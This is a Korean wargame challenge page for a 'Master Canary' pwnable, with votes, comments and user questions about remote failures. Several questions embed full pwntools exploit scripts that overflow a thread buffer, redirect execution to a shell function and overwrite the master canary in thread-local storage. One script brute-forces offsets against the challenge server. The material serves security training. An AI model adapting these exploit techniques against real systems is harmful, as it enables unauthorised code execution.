LEVEL 3

Master Canary

pwnable

1294

517

로그인 하고 문제 풀기

문제 정보
풀이 31
난이도 투표 49
질문 7
최근 풀이자 517
댓글 23

문제 설명

Description

Exploit Tech: Master Canary에서 실습하는 문제입니다.

Challenge Updates

2023.05.08: Dockerfile이 제공됩니다.
2023.05.26: Ubuntu 22.04 환경으로 업데이트하였습니다.

출제자 정보

대표 업적 없음

2022.02.04. 15:59:28

First Blood!

대표 업적 없음

출제된 지 4시간 만에 풀이 완료!

난이도 투표 49

전체 투표 로그

시스템 해킹 입문

LEVEL 4에 투표했습니다.

7일 전

대표 업적 없음

LEVEL 3에 투표했습니다.

16일 전

대표 업적 없음

LEVEL 4에 투표했습니다.

4개월 전

대표 업적 없음

LEVEL 4에 투표했습니다.

5개월 전

컴퍼니

LEVEL 3에 투표했습니다.

5개월 전

질문 5

문제 풀이에 어려움이 있으신가요?

커뮤니티에서 문제에 대한 질문하고 답변 얻기

우분투 20.04, 18.04 로컬에서는 됐는데 서버에서는 왜 안 될까요...

우분투 20.04, 18.04 로컬에서는 됐는데 서버에서는 왜 안 될까요... 설마 16.04 일까요

로컬에서는 되는데 서버에서 안됩니다 ㅠ

로컬환경 ubuntu 22.04로 서버와 동일합니다. 혹시몰라 강의 예제코드 복붙해서 실행시켜봤는데도 (process() 만 remote() 로 변경해서요) 안됩니다... 이유가 있을까요?

Dockerfile로 구성한 환경에서는 되는데 서버에서는 안됩니다.

image.png 주어진 Dockerfile 빌드 (docker build -t m_t . ; docker run -d -it -p 7182:7182 --name mc_thread m_t) from pwn import * context.arch = 'amd64' context.log_level = 'debug' p = process('./mc_thread') p = remote("host3.dreamhack.games", 17841) p = remote('localhost', 7182) e = ELF('./mc_thread') def gdb_on(): gdb.attach(p) pause() gdb_on() code_section_addr = 0x404500-0x972 p.sendlineafter(b'Size: ', b'2352') payload = b'A'*0x110 # dummy payload += b'B'*0x8 # sfp payload += p64(e.symbols['giveshell']) # ret payload += b'C'*0x7f0 # dummy payload += p64(code_section_addr) # fs+0x10 payload += b'A'*0x18 # fs+0x28 p.sendafter(b'Data: ', payload) p.interactive() image.png p = remote('localhost', 7182)로 flag 출력 확인 image.png p = remote("host3.dreamhack.games", 17841) 실패 제공된 Dockerfile을 빌드해서 테스트 했을 때, flag 출력을 확인을 했기에 서버와 동일하다고 생각 돼 서버 주소로 바꾸니 되지 않습니다...Dockerfile과 서버 환경이 다른지, 아니면 제가 잘못 빌드한 것인지 궁금합니다.

send 여러 보내는 것과 한번 보내는 것의 차이가 궁금합니다.

아래처럼 p.send 호출할 때 하나의 payload 를 만들어서 호출하면 서버에 제출 시 쉘 획득이 되는데, from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") payload = b"A" * 0x110 payload += b"A" * 8 payload += p64(p_elf.symbols["giveshell"]) payload += b"A" * (d - 0x10) payload += b"A" * 0x10 payload += p64(0x404800 - 0x972) payload += b"A" * 0x18 p.send(payload) p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 제공된 소스코드에 read가 여러번 나눠서 받아 아래처럼 send를 똑같은 수만큼 나눠서 전송하면 p.recv(100) 에서 EOFError 가 나는데 이유가 무엇인지 궁금합니다. from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") for i in range(0x100 // 8): p.send(b"A" * 8) p.send(b"A" * 8) # rbp - 0x10 p.send(b"A" * 8) # rbp - 0x8(cnry) p.send(b"A" * 8) # rbp(sfp) p.send(p64(p_elf.symbols["giveshell"])) for i in range((d - 0x10) // 8): p.send(b"A"*8) p.send(b"A" * 8) p.send(b"A" * 8) p.send(p64(0x404800 - 0x972)) # pthread->self p.send(b"A" * 8) p.send(b"A" * 8) p.send(b"A" * 8) # master canary overwrite p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 근데 또 이상한건 서버에 제출하면 안되는데, 제공된 Dockerfile로 Docker 환경 구축해서 제출(p = remote("localhost", 7182)) 혹은 로컬 환경(p = process("./mc_thread"))에서 실행하면 정상적으로 동작합니다...

Do I need to to fuzz?

The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script `from pwn import * context.log_level = 'debug' for i in range(400, 9000, 8): p = remote("host3.dreamhack.games", 17226) elf = ELF('./mc_thread') payload = b'A' * 264 payload += b'A' * 8 # canary payload += b'B' * 8 payload += p64(elf.symbols['giveshell']) payload += b'C' * (i - len(payload)) payload += p64(0x404800 - 0x972) payload += b'C' * (0x10) payload += p64(0x4141414141414141) inp_sz = len(payload) // 8 p.sendlineafter(b'Size: ', str(inp_sz).encode()) p.sendafter(b'Data: ', payload) p.sendline("cat flag") data = p.recvallS(timeout=3) if "DH{" in data: print(data) break` Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance

대표 업적 없음

20시간 전

휴머노이드

23시간 전

워게임 고인물

2일 전

대표 업적 없음

2일 전

강의 수강: 1

3일 전

강의 수강: 10

5일 전

대표 업적 없음

7일 전

시스템 해킹 입문

7일 전

대표 업적 없음

8일 전

워게임: 1

11일 전

댓글 23

휴머노이드

23시간 전

MTU 줄이니까 되네요

대표 업적 없음

4개월 전

이게 2단계?

해결사

1년 전

좋은 연습문제입니다. 중간에 함정이 하나 있네요

공부벌레

1년 전

이게 도대체 어딜 봐서 Level. 2 짜리 문제인거죠?

대표 업적 없음

1년 전

몇 시간을 날린거야...

워게임: 1

1년 전

좀 이상한데..

워게임 고인물

1년 전

업데이트 이후 버전이랑 전 버전이랑 난이도 차이나는듯. 그리고 오프셋 주의!

워게임 풀이: 1

1년 전

Select your padding contents "CAREFULLY", or SEGV.

답변 등록: 1

2년 전

:()

워게임 풀이: 20

2년 전

¯\_(ツ)_/¯